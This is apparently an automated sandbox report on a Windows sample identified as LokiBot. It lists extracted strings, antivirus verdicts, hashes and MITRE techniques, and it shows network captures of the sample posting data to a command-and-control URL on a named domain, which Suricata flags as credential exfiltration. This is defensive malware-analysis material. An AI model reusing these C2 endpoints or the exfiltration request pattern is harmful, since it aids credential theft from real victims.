BBRETRY
BBYES
PREVIEWGLYPH
DLGTEMPLATE
DVCLAL
PACKAGEINFO
TFORM1
MAINICON
MS Sans Serif
Connection timed out.
Connection refused."Too many levels of symbolic links.
File name too long.
Host is down.
No route to host.
Directory not empty
Host not found.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Address already in use. Cannot assign requested address.
Network is down.
Network is unreachable. Net dropped connection or reset.!Software caused connection abort.
Connection reset by peer.
No buffer space available.
Socket is already connected.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Socket Error # %d
Interrupted system call.
Bad file number.
Access denied.
Bad address.
Invalid argument.
Too many open files.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Destination address required.
Message too long.
Protocol wrong type for socket.
Bad protocol option.
Protocol not supported.
%Failed to set maximum selection range$Failed to set calendar min/max range%Failed to set calendar selected range
No help keyword specified.
Winsock Initialization Error.
Set Size Exceeded.
Thread Class Not Specified.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Connected.
Disconnecting.
Disconnected.
%s is not a valid service.
Info Text
Menu Background
Menu Text
Scroll Bar
3D Dark Shadow
3D Light
Window Background
Window Frame
Window Text %s is already associated with %s=This control requires version 4.70 or greater of COMCTL32.DLL
Date exceeds maximum of %s
Date is less than minimum of %s4You must be in ShowCheckbox mode to set to this date#Failed to set calendar date or time
Active Caption
Application Workspace
Background
Button Face
Button Highlight
Button Shadow
Button Text
Caption Text
Default
Gray Text
Highlight Background
Highlight Text
Inactive Border
Inactive Caption
Inactive Caption Text
Info Background
Purple
Silver
Yellow
Fuchsia
White
Money Green
Sky Blue
Cream
Medium Gray
Active Border
Alt+ Clipboard does not support Icons/Menu '%s' is already being used by another form
Docked control must have a name%Error removing control from dock tree
- Dock zone not found
- Dock zone has no control"Unable to find a Table of Contents
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Black
Maroon
Green
Olive
Enter
Space
Right
Shift+
Ctrl+
Warning
Error
Information
Confirm
Cancel
&Help
&Abort
&Retry
&Ignore
N&o to All
Yes to &All
Sub-menu is not in menu
Not enough timers [email protected] cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active*A control cannot have itself as its parent
Cancel
&Help
&Close
&Ignore
&Retry
Abort
Cannot drag a form
Out of system resources
Canvas does not allow drawing
Invalid image size
Invalid ImageList
Invalid ImageList Index)Failed to read ImageList data from stream(Failed to write ImageList data to stream$Error creating window device context
Error creating window class+Cannot focus a disabled or invisible window!Control '%s' has no parent window
Cannot hide an MDI Child Form)Cannot change Visible in OnShow or OnHide"Cannot make a visible window modal
Menu index out of range
Menu inserted twice
List index out of bounds (%d)+Out of memory while expanding memory stream
Error reading %s%s%s: %s
Stream read error
Property is read-only
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Stream write error
Thread Error: %s (%d)
Bitmap image is not valid
Icon image is not valid!Cannot change the size of an icon
Unsupported clipboard format
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid property path
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Ancestor for '%s' not found
Cannot assign a %s to a %s
January
February
March
April
August
September
October
November
December
Assertion failed
Interface not supported
Exception in safecall method
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
A call to an OS function failed
Write$Error creating variant or safe array)Variant or safe array index out of bounds
Variant or safe array is locked
Invalid variant type conversion
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Variant overflow
Invalid argument
Invalid variant type
Operation not supported
Unexpected variant error
External exception %x
Invalid floating point operation
Floating point division by zero
Floating point overflow
Floating point underflow
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Access violation
Stack overflow
Control-C hit
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value!'%s' is not a valid date and time
Invalid argument to time encode
Invalid argument to date encode
Out of memory
I/O error %d
File not found
Invalid filename
Too many open files
File access denied
Read beyond end of file
Disk full
Invalid numeric input
Division by zero
Range check error
Integer overflow

Full Results

Engine Signature Engine Signature Engine Signature
Bkav W32.AIDetectVM.malware2 MicroWorld-eScan Gen:Variant.Zusy.307895 FireEye Generic.mg.fab404e9df64df68
CAT-QuickHeal Clean McAfee Fareit-FTB!FAB404E9DF64 Cylance Unsafe
Zillya Clean SUPERAntiSpyware Clean Sangfor Clean
K7AntiVirus Clean Alibaba Clean K7GW Trojan ( 00569c031 )
Cybereason malicious.8c65e9 Arcabit Trojan.Zusy.D4B2B7 TrendMicro Clean
Baidu Clean F-Prot W32/Injector.ABY.gen!Eldorado Symantec ML.Attribute.HighConfidence
TotalDefense Clean APEX Malicious Paloalto generic.ml
ClamAV Clean Kaspersky HEUR:Trojan-Downloader.Win32.Adload.gen BitDefender Gen:Variant.Zusy.307895
NANO-Antivirus Clean ViRobot Clean Avast Clean
Tencent Clean Ad-Aware Gen:Variant.Zusy.307895 TACHYON Clean
Sophos Clean Comodo Clean F-Secure Clean
DrWeb Clean VIPRE Clean Invincea heuristic
Trapmine malicious.moderate.ml.score CMC Clean Emsisoft Gen:Variant.Zusy.307895 (B)
SentinelOne DFI - Malicious PE Cyren W32/Injector.ABY.gen!Eldorado Jiangmin Clean
eGambit Clean Avira Clean Fortinet W32/Injector.ELXR!tr
Antiy-AVL Trojan[PSW]/Win32.Chisburg Kingsoft Clean Endgame malicious (high confidence)
Microsoft Trojan:Win32/Wacatac.C!ml AegisLab Clean ZoneAlarm HEUR:Trojan-Downloader.Win32.Adload.gen
Avast-Mobile Clean Cynet Malicious (score: 100) AhnLab-V3 Clean
Acronis suspicious BitDefenderTheta Gen:[email protected] MAX malware (ai score=87)
VBA32 Clean Malwarebytes Trojan.MalPack.DLF Zoner Clean
ESET-NOD32 a variant of Win32/Injector.EMNJ TrendMicro-HouseCall Clean Rising Trojan.Injector!1.AFE3 (RDMK:cmRtazqMCGXDbHXtTyk9x2/bBoIh)
Yandex Clean Ikarus Trojan.Inject MaxSecure Trojan.Malware.300983.susgen
GData Gen:Variant.Zusy.307895 Webroot W32.Trojan.Gen AVG Clean
Panda Trj/Genetic.gen CrowdStrike win/malicious_confidence_80% (D) Qihoo-360 HEUR/QVM05.1.40EA.Malware.Gen
Sorry! No behavior.

Hosts

Direct IP Country Name
N 103.129.98.18 [VT] unknown
Y 1.1.1.1 [VT] Australia

TCP

Source Source Port Destination Destination Port
192.168.1.4 49190 103.129.98.18 airmanselectiontest.com 80
192.168.1.4 49192 103.129.98.18 airmanselectiontest.com 80
192.168.1.4 49193 103.129.98.18 airmanselectiontest.com 80
192.168.1.4 49194 103.129.98.18 airmanselectiontest.com 80
192.168.1.4 49195 103.129.98.18 airmanselectiontest.com 80
192.168.1.4 49196 103.129.98.18 airmanselectiontest.com 80
192.168.1.4 49197 103.129.98.18 airmanselectiontest.com 80
192.168.1.4 49198 103.129.98.18 airmanselectiontest.com 80
192.168.1.4 49199 103.129.98.18 airmanselectiontest.com 80
192.168.1.4 49200 103.129.98.18 airmanselectiontest.com 80
192.168.1.4 49201 103.129.98.18 airmanselectiontest.com 80
192.168.1.4 49202 103.129.98.18 airmanselectiontest.com 80
192.168.1.4 49203 103.129.98.18 airmanselectiontest.com 80

UDP

Source Source Port Destination Destination Port
192.168.1.4 51228 1.1.1.1 53
192.168.1.4 51819 1.1.1.1 53
192.168.1.4 62350 1.1.1.1 53
192.168.1.4 137 192.168.1.255 137

DNS

Name Response Post-Analysis Lookup
airmanselectiontest.com [VT] A 103.129.98.18 [VT] 103.129.98.18 [VT]

HTTP Requests

URI Data
http://airmanselectiontest.com/dest/Panel/fre.php
POST /dest/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: airmanselectiontest.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 2EA05A32
Content-Length: 192
Connection: close

http://airmanselectiontest.com/dest/Panel/fre.php
POST /dest/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: airmanselectiontest.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 2EA05A32
Content-Length: 165
Connection: close

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

Timestamp Source IP Source Port Destination IP Destination Port Protocol GID SID REV Signature Category Severity
2020-06-30 13:30:35.977 192.168.1.4 [VT] 49177 13.107.42.23 [VT] 443 TCP 1 2028397 2 ET JA3 Hash - Possible Malware - Various Malspam/RigEK Unknown Traffic 3
2020-06-30 13:31:17.937 192.168.1.4 [VT] 49190 103.129.98.18 [VT] 80 TCP 1 2021641 7 ET MALWARE LokiBot User-Agent (Charon/Inferno) A Network Trojan was detected 1
2020-06-30 13:31:17.937 192.168.1.4 [VT] 49190 103.129.98.18 [VT] 80 TCP 1 2025381 5 ET MALWARE LokiBot Checkin Malware Command and Control Activity Detected 1
2020-06-30 13:31:18.502 192.168.1.4 [VT] 49190 103.129.98.18 [VT] 80 TCP 1 2024312 3 ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 A Network Trojan was detected 1
2020-06-30 13:31:18.502 192.168.1.4 [VT] 49190 103.129.98.18 [VT] 80 TCP 1 2024317 3 ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M2 A Network Trojan was detected 1
2020-06-30 13:31:18.868 192.168.1.4 [VT] 49192 103.129.98.18 [VT] 80 TCP 1 2021641 7 ET MALWARE LokiBot User-Agent (Charon/Inferno) A Network Trojan was detected 1
2020-06-30 13:31:18.868 192.168.1.4 [VT] 49192 103.129.98.18 [VT] 80 TCP 1 2025381 5 ET MALWARE LokiBot Checkin Malware Command and Control Activity Detected 1
2020-06-30 13:31:19.482 192.168.1.4 [VT] 49192 103.129.98.18 [VT] 80 TCP 1 2024312 3 ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 A Network Trojan was detected 1
2020-06-30 13:31:19.482 192.168.1.4 [VT] 49192 103.129.98.18 [VT] 80 TCP 1 2024317 3 ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M2 A Network Trojan was detected 1
2020-06-30 13:31:19.649 192.168.1.4 [VT] 49193 103.129.98.18 [VT] 80 TCP 1 2021641 7 ET MALWARE LokiBot User-Agent (Charon/Inferno) A Network Trojan was detected 1
2020-06-30 13:31:19.649 192.168.1.4 [VT] 49193 103.129.98.18 [VT] 80 TCP 1 2025381 5 ET MALWARE LokiBot Checkin Malware Command and Control Activity Detected 1
2020-06-30 13:31:20.260 192.168.1.4 [VT] 49193 103.129.98.18 [VT] 80 TCP 1 2024313 4 ET MALWARE LokiBot Request for C2 Commands Detected M1 Malware Command and Control Activity Detected 1
2020-06-30 13:31:20.260 192.168.1.4 [VT] 49193 103.129.98.18 [VT] 80 TCP 1 2024318 3 ET MALWARE LokiBot Request for C2 Commands Detected M2 Malware Command and Control Activity Detected 1
2020-06-30 13:31:20.260 103.129.98.18 [VT] 80 192.168.1.4 [VT] 49193 TCP 1 2025483 3 ET MALWARE LokiBot Fake 404 Response A Network Trojan was detected 1
2020-06-30 13:31:30.305 192.168.1.4 [VT] 49194 103.129.98.18 [VT] 80 TCP 1 2021641 7 ET MALWARE LokiBot User-Agent (Charon/Inferno) A Network Trojan was detected 1
2020-06-30 13:31:30.305 192.168.1.4 [VT] 49194 103.129.98.18 [VT] 80 TCP 1 2025381 5 ET MALWARE LokiBot Checkin Malware Command and Control Activity Detected 1
2020-06-30 13:31:30.902 192.168.1.4 [VT] 49194 103.129.98.18 [VT] 80 TCP 1 2024313 4 ET MALWARE LokiBot Request for C2 Commands Detected M1 Malware Command and Control Activity Detected 1
2020-06-30 13:31:30.902 192.168.1.4 [VT] 49194 103.129.98.18 [VT] 80 TCP 1 2024318 3 ET MALWARE LokiBot Request for C2 Commands Detected M2 Malware Command and Control Activity Detected 1
2020-06-30 13:31:30.902 103.129.98.18 [VT] 80 192.168.1.4 [VT] 49194 TCP 1 2025483 3 ET MALWARE LokiBot Fake 404 Response A Network Trojan was detected 1
2020-06-30 13:31:40.989 192.168.1.4 [VT] 49195 103.129.98.18 [VT] 80 TCP 1 2021641 7 ET MALWARE LokiBot User-Agent (Charon/Inferno) A Network Trojan was detected 1
2020-06-30 13:31:40.989 192.168.1.4 [VT] 49195 103.129.98.18 [VT] 80 TCP 1 2025381 5 ET MALWARE LokiBot Checkin Malware Command and Control Activity Detected 1
2020-06-30 13:31:41.549 192.168.1.4 [VT] 49195 103.129.98.18 [VT] 80 TCP 1 2024313 4 ET MALWARE LokiBot Request for C2 Commands Detected M1 Malware Command and Control Activity Detected 1
2020-06-30 13:31:41.549 192.168.1.4 [VT] 49195 103.129.98.18 [VT] 80 TCP 1 2024318 3 ET MALWARE LokiBot Request for C2 Commands Detected M2 Malware Command and Control Activity Detected 1
2020-06-30 13:31:41.549 103.129.98.18 [VT] 80 192.168.1.4 [VT] 49195 TCP 1 2025483 3 ET MALWARE LokiBot Fake 404 Response A Network Trojan was detected 1
2020-06-30 13:31:51.737 192.168.1.4 [VT] 49196 103.129.98.18 [VT] 80 TCP 1 2021641 7 ET MALWARE LokiBot User-Agent (Charon/Inferno) A Network Trojan was detected 1
2020-06-30 13:31:51.737 192.168.1.4 [VT] 49196 103.129.98.18 [VT] 80 TCP 1 2025381 5 ET MALWARE LokiBot Checkin Malware Command and Control Activity Detected 1
2020-06-30 13:31:52.347 192.168.1.4 [VT] 49196 103.129.98.18 [VT] 80 TCP 1 2024313 4 ET MALWARE LokiBot Request for C2 Commands Detected M1 Malware Command and Control Activity Detected 1
2020-06-30 13:31:52.347 192.168.1.4 [VT] 49196 103.129.98.18 [VT] 80 TCP 1 2024318 3 ET MALWARE LokiBot Request for C2 Commands Detected M2 Malware Command and Control Activity Detected 1
2020-06-30 13:31:52.347 103.129.98.18 [VT] 80 192.168.1.4 [VT] 49196 TCP 1 2025483 3 ET MALWARE LokiBot Fake 404 Response A Network Trojan was detected 1
2020-06-30 13:32:02.454 192.168.1.4 [VT] 49197 103.129.98.18 [VT] 80 TCP 1 2021641 7 ET MALWARE LokiBot User-Agent (Charon/Inferno) A Network Trojan was detected 1
2020-06-30 13:32:02.454 192.168.1.4 [VT] 49197 103.129.98.18 [VT] 80 TCP 1 2025381 5 ET MALWARE LokiBot Checkin Malware Command and Control Activity Detected 1
2020-06-30 13:32:03.105 192.168.1.4 [VT] 49197 103.129.98.18 [VT] 80 TCP 1 2024313 4 ET MALWARE LokiBot Request for C2 Commands Detected M1 Malware Command and Control Activity Detected 1
2020-06-30 13:32:03.105 192.168.1.4 [VT] 49197 103.129.98.18 [VT] 80 TCP 1 2024318 3 ET MALWARE LokiBot Request for C2 Commands Detected M2 Malware Command and Control Activity Detected 1
2020-06-30 13:32:03.105 103.129.98.18 [VT] 80 192.168.1.4 [VT] 49197 TCP 1 2025483 3 ET MALWARE LokiBot Fake 404 Response A Network Trojan was detected 1

Suricata TLS

Timestamp Source IP Source Port Destination IP Destination Port Subject Issuer Fingerprint Version
2020-06-30 13:30:35.991 192.168.1.4 [VT] 49177 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2

Suricata HTTP

Timestamp Source IP Source Port Destination IP Destination Port Method Status Hostname URI Content Type User Agent Referrer Length
2020-06-30 13:31:18.502 192.168.1.4 [VT] 49190 103.129.98.18 [VT] 80 404 airmanselectiontest.com [VT] /dest/Panel/fre.php text/html Mozilla/4.08 (Charon; Inferno) None 15
2020-06-30 13:31:19.482 192.168.1.4 [VT] 49192 103.129.98.18 [VT] 80 404 airmanselectiontest.com [VT] /dest/Panel/fre.php text/html Mozilla/4.08 (Charon; Inferno) None 15
2020-06-30 13:31:20.260 192.168.1.4 [VT] 49193 103.129.98.18 [VT] 80 404 airmanselectiontest.com [VT] /dest/Panel/fre.php text/html Mozilla/4.08 (Charon; Inferno) None 23
2020-06-30 13:31:30.902 192.168.1.4 [VT] 49194 103.129.98.18 [VT] 80 404 airmanselectiontest.com [VT] /dest/Panel/fre.php text/html Mozilla/4.08 (Charon; Inferno) None 23
2020-06-30 13:31:41.549 192.168.1.4 [VT] 49195 103.129.98.18 [VT] 80 404 airmanselectiontest.com [VT] /dest/Panel/fre.php text/html Mozilla/4.08 (Charon; Inferno) None 23
2020-06-30 13:31:52.347 192.168.1.4 [VT] 49196 103.129.98.18 [VT] 80 404 airmanselectiontest.com [VT] /dest/Panel/fre.php text/html Mozilla/4.08 (Charon; Inferno) None 23
2020-06-30 13:32:03.105 192.168.1.4 [VT] 49197 103.129.98.18 [VT] 80 404 airmanselectiontest.com [VT] /dest/Panel/fre.php text/html Mozilla/4.08 (Charon; Inferno) None 23
Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.1.4 49177 13.107.42.23 443 3b483d0b34894548b602e8d18cdc24c5 unknown
Sorry! No dropped files.
Sorry! No CAPE files.
Process Name file.exe
PID 5848
Dump Size 613888 bytes
Module Path C:\Users\Rebecca\AppData\Local\Temp\file.exe
Type PE image: 32-bit executable
PE timestamp 1992-06-19 22:22:17
MD5 38d7f9b3d7b53b8b3c912bdca3c4cbed
SHA1 37ab44b2a541c36bbc01749a682228e4f8d9a596
SHA256 027183cc753299ac1a0b7a2444071087a985a740ff4ea6f3ddc914d24444691b
CRC32 B4FC8A14
Ssdeep 12288:qCbpcLhilrm7G8oclWEAroCo3DQSTADd69uOmVgpM:NuLhi80JroneVcM
Dump Filename 027183cc753299ac1a0b7a2444071087a985a740ff4ea6f3ddc914d24444691b
Download Download Zip
Defense Evasion Credential Access Collection Privilege Escalation
  • T1116 - Code Signing
    • Signature - invalid_authenticode_signature
  • T1055 - Process Injection
    • Signature - InjectionInterProcess
  • T1045 - Software Packing
    • Signature - packer_unknown_pe_section_name
  • T1003 - Credential Dumping
    • Signature - infostealer_browser
  • T1081 - Credentials in Files
    • Signature - infostealer_browser
  • T1005 - Data from Local System
    • Signature - infostealer_browser
  • T1055 - Process Injection
    • Signature - InjectionInterProcess

    Processing ( 20.854 seconds )

    • 10.505 BehaviorAnalysis
    • 5.37 Suricata
    • 3.037 Static
    • 0.616 NetworkAnalysis
    • 0.494 VirusTotal
    • 0.368 CAPE
    • 0.11 Dropped
    • 0.083 TargetInfo
    • 0.081 ProcDump
    • 0.08 Deduplicate
    • 0.046 AnalysisInfo
    • 0.03 Debug
    • 0.018 Strings
    • 0.016 peid

    Signatures ( 1.0859999999999987 seconds )

    • 0.065 infostealer_bitcoin
    • 0.059 masquerade_process_name
    • 0.058 antiav_detectreg
    • 0.052 antivm_vbox_libs
    • 0.046 antiav_detectfile
    • 0.038 infostealer_ftp
    • 0.036 exec_crash
    • 0.03 territorial_disputes_sigs
    • 0.029 api_spamming
    • 0.027 decoy_document
    • 0.023 NewtWire Behavior
    • 0.023 infostealer_im
    • 0.022 antianalysis_detectfile
    • 0.021 antivm_vbox_files
    • 0.018 Doppelganging
    • 0.016 antiav_avast_libs
    • 0.016 predatorthethief_files
    • 0.015 antivm_vmware_files
    • 0.013 exploit_getbasekerneladdress
    • 0.013 exploit_gethaldispatchtable
    • 0.013 qulab_files
    • 0.013 ransomware_files
    • 0.012 geodo_banking_trojan
    • 0.011 antisandbox_sunbelt_libs
    • 0.011 antivm_vmware_libs
    • 0.011 antianalysis_detectreg
    • 0.011 infostealer_mail
    • 0.01 InjectionCreateRemoteThread
    • 0.01 antiav_bitdefender_libs
    • 0.01 antiav_bullgaurd_libs
    • 0.01 antiav_emsisoft_libs
    • 0.01 antiav_qurb_libs
    • 0.01 antiav_apioverride_libs
    • 0.01 antiav_nthookengine_libs
    • 0.01 antisandbox_sboxie_libs
    • 0.01 injection_createremotethread
    • 0.01 stealth_timeout
    • 0.009 ransomware_extensions
    • 0.008 malicious_dynamic_function_loading
    • 0.008 office_com_load
    • 0.008 antivm_vbox_keys
    • 0.008 antivm_vmware_keys
    • 0.007 dynamic_function_loading
    • 0.007 infostealer_browser
    • 0.007 network_anomaly
    • 0.007 antidbg_devices
    • 0.007 codelux_behavior
    • 0.006 antidebug_guardpages
    • 0.006 antivm_xen_keys
    • 0.005 InjectionInterProcess
    • 0.005 antivm_generic_disk
    • 0.005 regsvr32_squiblydoo_dll_load
    • 0.005 exploit_heapspray
    • 0.005 injection_runpe
    • 0.005 network_tor
    • 0.005 office_dotnet_load
    • 0.005 office_vb_load
    • 0.005 office_wmi_load
    • 0.004 InjectionProcessHollowing
    • 0.004 betabot_behavior
    • 0.004 dridex_behavior
    • 0.004 hawkeye_behavior
    • 0.004 kazybot_behavior
    • 0.004 kibex_behavior
    • 0.004 mimics_filetime
    • 0.004 persistence_autorun
    • 0.004 reads_self
    • 0.004 stealth_file
    • 0.004 virus
    • 0.004 antivm_vpc_keys
    • 0.004 banker_cridex
    • 0.004 masslogger_files
    • 0.003 bootkit
    • 0.003 shifu_behavior
    • 0.003 antivm_parallels_keys
    • 0.003 antivm_vbox_devices
    • 0.003 antivm_vpc_files
    • 0.003 ketrican_regkeys
    • 0.003 network_tor_service
    • 0.003 rat_pcclient
    • 0.002 antivm_generic_scsi
    • 0.002 guloader_apis
    • 0.002 encrypted_ioc
    • 0.002 hancitor_behavior
    • 0.002 stack_pivot
    • 0.002 antivm_generic_diskreg
    • 0.002 bitcoin_opencl
    • 0.002 browser_security
    • 0.002 bypass_firewall
    • 0.002 darkcomet_regkeys
    • 0.002 disables_browser_warn
    • 0.002 arkei_files
    • 0.002 azorult_mutexes
    • 0.002 network_cnc_http
    • 0.002 network_torgateway
    • 0.002 obliquerat_files
    • 0.002 sniffer_winpcap
    • 0.002 targeted_flame
    • 0.001 InjectionSetWindowLong
    • 0.001 alphacrypt_behavior
    • 0.001 antiemu_wine_func
    • 0.001 antivm_generic_services
    • 0.001 cerber_behavior
    • 0.001 infostealer_browser_password
    • 0.001 injection_explorer
    • 0.001 kovter_behavior
    • 0.001 rat_nanocore
    • 0.001 OrcusRAT Behavior
    • 0.001 tinba_behavior
    • 0.001 antisandbox_cuckoo_files
    • 0.001 antisandbox_fortinet_files
    • 0.001 antisandbox_joe_anubis_files
    • 0.001 antisandbox_sunbelt_files
    • 0.001 antisandbox_threattrack_files
    • 0.001 antivm_xen_keys
    • 0.001 antivm_hyperv_keys
    • 0.001 banker_zeus_mutex
    • 0.001 bot_drive
    • 0.001 bot_drive2
    • 0.001 modify_proxy
    • 0.001 clears_logs
    • 0.001 network_dns_opennic
    • 0.001 revil_mutexes
    • 0.001 dcrat_files
    • 0.001 limerat_regkeys
    • 0.001 modirat_bheavior
    • 0.001 warzonerat_files
    • 0.001 warzonerat_regkeys
    • 0.001 recon_checkip
    • 0.001 recon_fingerprint
    • 0.001 remcos_files
    • 0.001 spreading_autoruninf
    • 0.001 lokibot_mutexes

    Reporting ( 16.454 seconds )

    • 12.788 BinGraph
    • 3.544 JsonDump
    • 0.104 MITRE_TTPS
    • 0.018 PCAP2CERT